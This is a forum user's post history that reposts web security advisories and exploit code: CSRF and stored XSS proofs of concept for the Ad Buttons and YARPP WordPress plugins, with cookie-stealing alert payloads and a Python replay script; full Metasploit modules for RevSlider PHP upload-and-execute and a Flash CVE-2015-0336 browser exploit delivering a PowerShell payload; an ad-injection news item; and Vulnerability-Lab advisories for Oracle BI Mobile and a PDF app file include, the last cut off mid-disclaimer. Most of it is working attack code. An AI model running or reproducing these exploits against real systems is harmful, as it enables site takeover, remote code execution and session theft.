Everything posted by Aerosol
-
================================================================
CSRF/Stored XSS Vulnerability in Ad Buttons Plugin
================================================================

.. contents:: Table of Contents

Overview
========
* Title: CSRF and Stored XSS Vulnerability in Ad Buttons WordPress Plugin
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/ad-buttons/
* Severity: HIGH
* Version Affected: 2.3.1 and most likely prior versions
* Version Tested: 2.3.1
* Version Patched: None (plugin closed)

Description
===========

Vulnerable Parameter
--------------------
* "Your Ad Here" URL

About Vulnerability
-------------------
This plugin is vulnerable to a combined CSRF/XSS attack: if an admin user can be tricked into visiting a URL crafted by the attacker (via spear phishing or social engineering), the attacker can insert arbitrary script into the admin page. Once exploited, the admin's browser can be made to do almost anything the admin user could normally do, for example by hijacking the admin's cookies.

Vulnerability Class
===================
Cross-Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross-Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))

Steps to Reproduce (PoC)
========================
After installing the plugin:

1. Go to Dashboard --> Ad Buttons --> Settings.
2. Insert this payload into the vulnerable parameter mentioned above:

   ">><script>+-+-1-+-+alert(document.cookie)</script>

   Save the settings and see the XSS in action.
3. Visit the Ad Buttons settings page of this plugin at any later time; the script executes because it is stored.

The plugin does not use any nonces, so the same settings can also be changed through a CSRF attack. The PoC code for that follows.

CSRF PoC Code
=============
<html>
  <body>
    <form action="http://127.0.0.1/wp/wp-admin/admin.php?page=ad-buttons-settings" method="POST">
      <input type="hidden" name="ab_dspcnt" value="1" />
      <input type="hidden" name="ab_title" value="" />
      <input type="hidden" name="ab_target" value="bnk" />
      <input type="hidden" name="ab_powered" value="1" />
      <input type="hidden" name="ab_count" value="1" />
      <input type="hidden" name="ab_yaht" value="pag" />
      <input type="hidden" name="ab_yourad" value="44" />
      <input type="hidden" name="ab_yahurl" value="">><script>+-+-1-+-+alert(6)</script>" />
      <input type="hidden" name="ab_adsense_fixed" value="1" />
      <input type="hidden" name="ab_adsense_pos" value="1" />
      <input type="hidden" name="ab_adsense_pubid" value="pub-" />
      <input type="hidden" name="ab_adsense_channel" value="" />
      <input type="hidden" name="ab_adsense_corners" value="rc:0" />
      <input type="hidden" name="ab_adsense_col_border" value="#" />
      <input type="hidden" name="ab_adsense_col_title" value="#" />
      <input type="hidden" name="ab_adsense_col_bg" value="#" />
      <input type="hidden" name="ab_adsense_col_txt" value="#" />
      <input type="hidden" name="ab_adsense_col_url" value="#" />
      <input type="hidden" name="ab_width" value="<img" />
      <input type="hidden" name="ab_padding" value="<img" />
      <input type="hidden" name="Submit" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Mitigation
==========
Plugin closed.

Change Log
==========
Plugin closed.

Disclosure
==========
18-April-2015: Reported to developer
Plugin closed
8-May-2015: Public disclosure

Credits
=======
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh (at) me (dot) com
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

Source
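The CSRF form above can also be replayed programmatically when re-testing a disposable install. The following is a minimal Python sketch, not part of the original advisory: it assumes a local test site at 127.0.0.1/wp and a valid admin session cookie (placeholder name), sends only the fields relevant to the payload, and then checks whether the payload from the PoC comes back unescaped on the settings page.

# Hypothetical verification sketch for the stored-XSS half of the advisory above.
# Assumes a disposable test install and a valid admin session cookie; the
# parameter names (ab_yahurl, etc.) come from the CSRF PoC in the advisory.
import requests

TARGET = "http://127.0.0.1/wp"                       # test install only (assumption)
SETTINGS = f"{TARGET}/wp-admin/admin.php?page=ad-buttons-settings"
COOKIES = {"wordpress_logged_in_xxx": "REPLACE_ME"}  # placeholder admin session cookie
MARKER = "<script>+-+-1-+-+alert(document.cookie)</script>"

def submit_payload():
    """Replay the settings POST with the XSS payload in the ab_yahurl field.
    Only the payload-relevant fields are shown; the full list is in the PoC above."""
    data = {
        "ab_dspcnt": "1",
        "ab_yourad": "44",
        "ab_yahurl": '">>' + MARKER,
        "Submit": "Save Changes",
    }
    return requests.post(SETTINGS, data=data, cookies=COOKIES, timeout=10)

def payload_is_stored():
    """The bug is confirmed if the settings page echoes the script tag unescaped."""
    page = requests.get(SETTINGS, cookies=COOKIES, timeout=10).text
    return MARKER in page

if __name__ == "__main__":
    submit_payload()
    print("stored XSS present" if payload_is_stored() else "payload not reflected unescaped")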
-
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress RevSlider File Upload and Execute Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress ThemePunch
        Revolution Slider (revslider) plugin, version 3.0.95 and prior. The
        vulnerability allows for arbitrary file upload and remote code execution.
      },
      'Author'         =>
        [
          'Simo Ben youssef',                  # Vulnerability discovery
          'Tom Sellers <tom[at]fadedcode.net>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'],
          ['EDB', '35385'],
          ['WPVDB', '7954'],
          ['OSVDB', '115118']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]],
      'DisclosureDate' => 'Nov 26 2015',
      'DefaultTarget'  => 0)
    )
  end

  def check
    release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt')
    check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96')
  end

  def exploit
    php_pagename = rand_text_alpha(4 + rand(4)) + '.php'

    # Build the zip
    payload_zip = Rex::Zip::Archive.new
    # If the filename in the zip is revslider.php it will be automatically
    # executed but it will break the plugin and sometimes WordPress
    payload_zip.add_file('revslider/' + php_pagename, payload.encoded)

    # Build the POST body
    data = Rex::MIME::Message.new
    data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"')
    data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"')
    data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"")
    post_data = data.to_s

    res = send_request_cgi(
      'uri'    => wordpress_url_admin_ajax,
      'method' => 'POST',
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    )

    if res
      if res.code == 200 && res.body =~ /Update in progress/
        # The payload itself is almost never deleted, try anyway
        register_files_for_cleanup(php_pagename)
        # This normally works
        register_files_for_cleanup('../revslider.zip')

        final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename)
        print_good("#{peer} - Our payload is at: #{final_uri}")
        print_status("#{peer} - Calling payload...")
        send_request_cgi(
          'uri'     => normalize_uri(final_uri),
          'timeout' => 5
        )
      elsif res.code == 200 && res.body =~ /^0$/
        # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown
        fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated")
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'ERROR')
    end
  end
end

Source
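Outside of Metasploit, the module's check logic (read the plugin's release_log.txt and compare the advertised version against the fixed release 3.0.96) can be reproduced in a few lines. The sketch below is a detection-only Python illustration, not part of the module; the WordPress base URL is a placeholder you would replace with a host you are authorized to assess.

# Detection-only sketch mirroring the module's check(): read revslider's
# release_log.txt and flag versions below 3.0.96 as likely vulnerable.
import re
import requests

TARGET = "http://127.0.0.1/wordpress"   # assumption: WordPress base URL of a test host
FIXED = (3, 0, 96)

def revslider_version(base_url):
    url = base_url.rstrip("/") + "/wp-content/plugins/revslider/release_log.txt"
    r = requests.get(url, timeout=10)
    if r.status_code != 200:
        return None
    m = re.search(r"^\s*version\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?)", r.text, re.I | re.M)
    return m.group(1) if m else None

def looks_vulnerable(version):
    parts = tuple(int(p) for p in version.split("."))
    # Pad to three components so "3.0" compares like (3, 0, 0)
    parts += (0,) * (3 - len(parts))
    return parts < FIXED

if __name__ == "__main__":
    v = revslider_version(TARGET)
    if v is None:
        print("revslider release_log.txt not found")
    else:
        print(f"revslider {v}: {'likely vulnerable' if looks_vulnerable(v) else 'patched'}")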
-
https://wordpress.org/plugins/yet-another-related-posts-plugin/ Affected Versions <= 4.2.4 Description 'Yet Another Related Posts Plugin' options can be updated with no token/nonce protection which an attacker may exploit via tricking website's administrator to enter a malformed page which will change YARPP options, and since some options allow html the attacker is able to inject malformed javascript code which can lead to *code execution/administrator actions* when the injected code is triggered by an admin user. injected javascript code is triggered on any post page. Vulnerability Scope XSS RCE ( http://research.evex.pw/?vuln=14 ) Authorization Required None Proof of Concept <body onload="document.getElementById('payload_form').submit()" > <form id="payload_form" action="http://wpsite.com/wp-admin/options-general.php?page=yarpp" method="POST" > <input type='hidden' name='recent_number' value='12' > <input type='hidden' name='recent_units' value='month' > <input type='hidden' name='threshold' value='5' > <input type='hidden' name='weight[title]' value='no' > <input type='hidden' name='weight[body]' value='no' > <input type='hidden' name='tax[category]' value='no' > <input type='hidden' name='tax[post_tag]' value='consider' > <input type='hidden' name='auto_display_post_types[post]' value='on' > <input type='hidden' name='auto_display_post_types[/page][page]' value='on' > <input type='hidden' name='auto_display_post_types[attachment]' value='on' > <input type='hidden' name='auto_display_archive' value='true' > <input type='hidden' name='limit' value='1' > <input type='hidden' name='use_template' value='builtin' > <input type='hidden' name='thumbnails_heading' value='Related posts:' > <input type='hidden' name='no_results' value='<script>alert(1);</script>' > <input type='hidden' name='before_related' value='<script>alert(1);</script><li>' > <input type='hidden' name='after_related' value='</li>' > <input type='hidden' name='before_title' value='<script>alert(1);</script><li>' > <input type='hidden' name='after_title' value='</li>' > <input type='hidden' name='show_excerpt' value='true' > <input type='hidden' name='excerpt_length' value='10' > <input type='hidden' name='before_post' value='+<small>' > <input type='hidden' name='after_post' value='</small>' > <input type='hidden' name='order' value='post_date ASC' > <input type='hidden' name='promote_yarpp' value='true' > <input type='hidden' name='rss_display' value='true' > <input type='hidden' name='rss_limit' value='1' > <input type='hidden' name='rss_use_template' value='builtin' > <input type='hidden' name='rss_thumbnails_heading' value='Related posts:' > <input type='hidden' name='rss_no_results' value='No Results' > <input type='hidden' name='rss_before_related' value='<li>' > <input type='hidden' name='rss_after_related' value='</li>' > <input type='hidden' name='rss_before_title' value='<li>' > <input type='hidden' name='rss_after_title' value='</li>' > <input type='hidden' name='rss_show_excerpt' value='true' > <input type='hidden' name='rss_excerpt_length' value='10' > <input type='hidden' name='rss_before_post' value='+<small>' > <input type='hidden' name='rss_after_post' value='</small>' > <input type='hidden' name='rss_order' value='score DESC' > <input type='hidden' name='rss_promote_yarpp' value='true' > <input type='hidden' name='update_yarpp' value='Save Changes' > </form></body> Fix No Fix Available at The Moment. 
Timeline
Notified Vendor - No Reply
Notified Vendor Again - No Reply
Public Disclosure

@evex_1337
Homepage: http://research.evex.pw/?vuln=15

Source
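Because the PoC stores its script in YARPP's no_results/before_related/before_title options and the advisory notes the injected code fires on any post page, a quick post-exploitation check on your own test site is simply to fetch a post and look for the marker. The helper below is an illustrative Python sketch under those assumptions, not part of the original advisory.

# After running the CSRF PoC against a disposable test site, the injected
# <script>alert(1);</script> should appear wherever YARPP renders related posts.
import sys
import requests

MARKER = "<script>alert(1);</script>"   # payload used in the PoC form above

def yarpp_payload_present(post_url):
    html = requests.get(post_url, timeout=10).text
    return MARKER in html

if __name__ == "__main__":
    url = sys.argv[1] if len(sys.argv) > 1 else "http://wpsite.com/?p=1"  # placeholder post URL
    print("injected" if yarpp_payload_present(url) else "clean")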
-
Google spam abuse researcher Kurt Thomas says some 84,000 injectors and apps are targeting its Chrome web browser with dodgy advertising. Thomas says the apps include 50,000 browser extensions and 34,000 applications which target Chrome to display revenue-generating ads within the sites that victims browse. About a third of these identified in the study Ad Injection at Scale: Assessing Deceptive Advertisement Modifications [PDF] by boffins at universities California, Berkeley, and Santa Barbara were "outright malicious", he says. "Upwards of 30 percent of these packages were outright malicious and simultaneously stole account credentials, hijacked search queries, and reported a user’s activity to third parties for tracking," Thomas says. "In total, we found 5.1 percent of page views on Windows and 3.4 percent of page views on Mac that showed tell-tale signs of ad injection software. "The ad injection ecosystem profits from more than 3000 victimised advertisers — including major retailers like Sears, Walmart, Target, Ebay — who unwittingly pay for traffic to their sites." Thomas says advertisers are blind to the injector process and see only the final ad click. University researchers found about 1000 profiteering affiliates who score commissions for injected ad clicks including Crossrider, Shopper Pro, and Netcrawl. Of the 25 businesses that provide the ads, Superfish and Jollywallet are "by far" the most popular accounting for 3.9 percent and 2.4 percent of Google views, respectively. The former ad injector became an internet pariah after users revealed it had been quietly foisted on Lenovo laptops. It has since been removed. But Choc Factory efforts are helping; Thomas says the number of warnings generated when users click on injected ads has fallen 95 percent since the company created warning flags last month and killed off 192 "deceptive" ad fiddling Chrome extensions. "This suggests it's become much more difficult for users to download unwanted software, and for bad advertisers to promote it," Thomas says. Google has also updated its ad policies to cut out the slimeballs and urges legitimate advertisers to do the same. Source
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Powershell include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => 'Adobe Flash Player NetConnection Type Confusion', 'Description' => %q{ This module exploits a type confusion vulnerability in the NetConnection class on Adobe Flash Player. When using a correct memory layout this vulnerability allows to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like vectors, and finally accomplish remote code execution. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 16.0.0.305. }, 'License' => MSF_LICENSE, 'Author' => [ 'Natalie Silvanovich', # Vulnerability discovery and Google Project Zero Exploit 'Unknown', # Exploit in the wild 'juan vazquez' # msf module ], 'References' => [ ['CVE', '2015-0336'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-05.html'], ['URL', 'http://googleprojectzero.blogspot.com/2015/04/a-tale-of-two-exploits.html'], ['URL', 'http://malware.dontneedcoffee.com/2015/03/cve-2015-0336-flash-up-to-1600305-and.html'], ['URL', 'https://www.fireeye.com/blog/threat-research/2015/03/cve-2015-0336_nuclea.html'], ['URL', 'https://blog.malwarebytes.org/exploits-2/2015/03/nuclear-ek-leverages-recently-patched-flash-vulnerability/'] ], 'Payload' => { 'DisableNops' => true }, 'Platform' => 'win', 'BrowserRequirements' => { :source => /script|headers/i, :os_name => OperatingSystems::Match::WINDOWS_7, :ua_name => Msf::HttpClients::IE, :flash => lambda { |ver| ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.305') }, :arch => ARCH_X86 }, 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => 'Mar 12 2015', 'DefaultTarget' => 0)) end def exploit @swf = create_swf @trigger = create_trigger super end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status('Sending SWF...') send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) b64_payload = Rex::Text.encode_base64(psh_payload) trigger_hex_stream = @trigger.unpack('H*')[0] html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>&tr=<%=trigger_hex_stream%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&tr=<%=trigger_hex_stream%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'msf.swf') swf 
= ::File.open(path, 'rb') { |f| swf = f.read } swf end def create_trigger path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'trigger.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end end Source
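The module only fires when the browser reports a Flash 16.x build at or below 16.0.0.305 (the :flash lambda in BrowserRequirements). For readers who want to apply the same gate to their own telemetry or log data outside Ruby, the sketch below is an illustrative Python equivalent, not part of the module itself.

# Python equivalent of the module's Flash-version requirement:
# a 16.x build no newer than 16.0.0.305 is considered in scope.
def flash_version_in_scope(ver: str) -> bool:
    if not ver.startswith("16."):
        return False
    parts = tuple(int(p) for p in ver.split("."))
    # Pad so "16.0" compares like (16, 0, 0, 0)
    parts += (0,) * (4 - len(parts))
    return parts <= (16, 0, 0, 305)

if __name__ == "__main__":
    for v in ("16.0.0.305", "16.0.0.287", "16.0.0.306", "17.0.0.134"):
        print(v, flash_version_in_scope(v))   # True, True, False, False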
-
Document Title: =============== Oracle Business Intelligence Mobile HD v11.x iOS - Persistent UI Vulnerability References (Source): ==================== http://vulnerability-lab.com/get_content.php?id=1361 Oracle Security ID: S0540289 Tracking ID: S0540289 Reporter ID: #1 2015Q1 Release Date: ============= 2015-05-06 Vulnerability Laboratory ID (VL-ID): ==================================== 1361 Common Vulnerability Scoring System: ==================================== 3.8 Product & Service Introduction: =============================== Oracle Business Intelligence Mobile HD brings new capabilities that allows users to make the most of their analytics information and leverage their existing investment in BI. Oracle Business Intelligence Mobile for Apple iPad is a mobile analytics app that allows you to view, analyze and act on Oracle Business Intelligence 11g content. Using Oracle Business Intelligence Mobile, you can view, analyze and act on all your analyses, dashboards, scorecards, reports, alerts and notifications on the go. Oracle Business Intelligence Mobile allows you to drill down reports, apply prompts to filter your data, view interactive formats on geo-spatial visualizations, view and interact with Dashboards, KPIs and Scorecards. You can save your analyses and Dashboards for offline viewing, and refresh them when online again; thus providing always-available access to the data you need. This app is compatible with Oracle Business Intelligence 11g, version 11.1.1.6.2BP1 and above. (Copy of the Vendor Homepage: http://www.oracle.com/technetwork/middleware/bi-foundation/bi-mobile-hd-1983913.html ) (Copy of the APP Homepage: https://itunes.apple.com/us/app/oracle-business-intelligence/id534035015 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered an application-side validation web vulnerability in the official Oracle Business Intelligence Mobile HD v11.1.1.7.0.2420 iOS web-application. Vulnerability Disclosure Timeline: ================================== 2014-10-27: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2014-11-01: Vendor Notification (Oracle Sec Alert Team - Acknowledgement Program) 2015-02-25: Vendor Response/Feedback (Oracle Sec Alert Team - Acknowledgement Program) 2015-04-15: Vendor Fix/Patch (Oracle Developer Team) 2015-05-01: Bug Bounty Reward (Oracle Sec Alert Team - CPU Bulletin Acknowledgement) 2015-05-06: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Oracle Product: Business Intelligence Mobile HD 11.1.1.7.0.2420 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ The Vulnerability Laboratory Research Team discovered an application-side validation web vulnerability in the official Oracle Business Intelligence Mobile HD v11.1.1.7.0.2420 iOS web-application. The vulnerability is located in the input field of the dasboard file export name value of the local save (lokal speichern) function. After the injection of a system specific command to the input field of the dasboard name the attacker is able to use the email function. By clicking the email button the script code gets wrong encoded even if the attachment function is activated for pdf only. 
The wrong encoded input of the lokal save in the mimeAttachmentHeaderName (mimeAttachmentHeader) allows a local attacker to inject persistent system specific codes to compromise the integrity of the oracle ib email function. In case of the scenario the issue get first correct encoded on input and the reverse encoded inside allows to manipulate the mail context. Regular the function is in use to get the status notification mail with attached pdf or html file. For the tesings the pdf value was activated and without html. The security risk of the filter bypass and application-side input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. Exploitation of the persistent web vulnerability requires a low privilege web application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects, persistent load of malicous script codes or persistent web module context manipulation. Vulnerable Module(s): [+] Lokal speichern - Local save Vulnerable Parameter(s): [+] mimeAttachmentHeaderName (mimeAttachmentHeader) Affected Service(s): [+] Email - Local Dasboard File Proof of Concept (PoC): ======================= The application-side vulnerability can be exploited by local privilege application user accounts with low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual reproduce of the vulnerability ... 1. Install the oracle business intelligence mobile hd ios app to your apple device (https://itunes.apple.com/us/app/oracle-business-intelligence/id534035015) 2. Register to your server service to get access to the client functions 2. Click the dashboard button to access 3. Now, we push top right in the navigation the local save (lokal speichern) button 4. Inject system specific payload with script code to the lokal save dashboard filename input field 5. Switch back to the app index and open the saved dashboard that as been saved locally with the payload (mimeAttachmentHeaderName) 6. Push in the top right navigation the email button 7. The mail client opens with the wrong encoded payload inside of the mail with the template of the dashboard 8. Successful reproduce of the security vulnerability! PoC: Email - Local Dasboard File <meta http-equiv="content-type" content="text/html; "> <div>"><[PERSISTENT INJECTED SCRIPT CODE!]"></x></div><div><br><br></div><br> <fieldset class="mimeAttachmentHeader"><legend class="mimeAttachmentHeaderName">"><"x">%20<[PERSISTENT INJECTED SCRIPT CODE!]>.html</legend></fieldset><br> Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure restriction and filter validation of the local dashboard file save module. Encode the input fields and parse the ouput next to reverse converting the context of the application through the mail function. The issue is not located in the apple device configuration because of the validation of the mimeAttachmentHeaderName in connection with the email function is broken. Security Risk: ============== The security risk of the application-side input validation web vulnerability in the oracle mobile application is estimated as medium. 
(CVSS 3.8) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - Evolution Security GmbH ™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
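The fix section boils down to one rule: a user-controlled dashboard file name must be encoded before it is written into the mail's mimeAttachmentHeaderName markup. As a language-neutral illustration only (this is not Oracle's code, and the markup below merely mimics the structure shown in the PoC), HTML-escaping the name at output time neutralizes the injected payload.

# Illustrative only: escape a user-supplied dashboard name before embedding it
# in HTML mail markup, so a payload like the one in the PoC renders as text.
import html

def attachment_header_html(filename: str) -> str:
    safe = html.escape(filename, quote=True)
    return (
        '<fieldset class="mimeAttachmentHeader">'
        f'<legend class="mimeAttachmentHeaderName">{safe}</legend>'
        '</fieldset>'
    )

if __name__ == "__main__":
    hostile = '"><x>%20<script>alert(1)</script>.html'
    print(attachment_header_html(hostile))
    # The < > " characters come out as &lt; &gt; &quot;, so no markup is injected.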
-
Document Title: =============== PDF Converter & Editor 2.1 iOS - File Include Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1480 Release Date: ============= 2015-05-06 Vulnerability Laboratory ID (VL-ID): ==================================== 1480 Common Vulnerability Scoring System: ==================================== 6.9 Product & Service Introduction: =============================== Text Editor & PDF Creator is your all-in-one document management solution for iPhone, iPod touch and iPad. It can catch documents from PC or Mac via USB cable or WIFI, email attachments, Dropbox and box and save it on your iPhone, iPod Touch or iPad locally. (Copy of the Vendor Homepage: https://itunes.apple.com/it/app/text-editor-pdf-creator/id639156936 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered file include web vulnerability in the official AppzCreative - PDF Converter & Text Editor v2.1 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-05-06: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== AppzCreative Ltd Product: PDF Converter & Text Editor - iOS Web Application (Wifi) 2.1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A local file include web vulnerability has been discovered in the official AppzCreative - PDF Converter & Text Editor v2.1 iOS mobile web-application. The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application. The web vulnerability is located in the `filename` value of the `submit upload` module. Remote attackers are able to inject own files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` in connection with the vulnerable file upload POST method request. Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise. Request Method(s): [+] [POST] Vulnerable Module(s): [+] Submit (Upload) Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index File Dir Listing (http://localhost:52437/) Proof of Concept (PoC): ======================= The local file include web vulnerability can be exploited by remote attackers (network) without privileged application user account and without user interaction. 
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Install the software to your iOS device 2. Start the mobile ios software and activate the web-server 3. Open the wifi interface for file transfers 4. Start a session tamper and upload a random fil 5. Change in the live tamper by interception of the vulnerable value the filename input (lfi payload) 6. Save the input by processing to continue the request 7. The code executes in the main file dir index list of the local web-server (localhost:52437) 8. Open the link with the private folder and attach the file for successful exploitation with the path value 9. Successful reproduce of the vulnerability! PoC: Upload File (http://localhost:52437/Box/) <div id="module_main"><bq>Files</bq><p><a href="..">..</a><br> <a href="<iframe>2.png"><../[LOCAL FILE INCLUDE VULNERABILITY IN FILENAME!]>2.png</a> ( 0.5 Kb, 2015-04-30 10:58:46 +0000)<br /> </p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file<input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" /></label></form></div></center></body></html></iframe></a></p></div> --- PoC Session Logs [POST] (LFI - Filename) --- Status: 200[OK] POST http://localhost:52437/Box/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3262] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:52437] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:52437/Box/] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------321711425710317 Content-Disposition: form-data; name="file"; filename="../[LOCAL FILE INCLUDE VULNERABILITY IN FILENAME!]>2.png" Content-Type: image/png Reference(s): http://localhost:52437/ http://localhost:52437/Box/ Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks. Encode the output in the file dir index list with the vulnerable name value to prevent application-side script code injection attacks. Security Risk: ============== The security rsik of the local file include web vulnerability in the filename value of the wifi service is estimated as high. (CVSS 6.9) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of 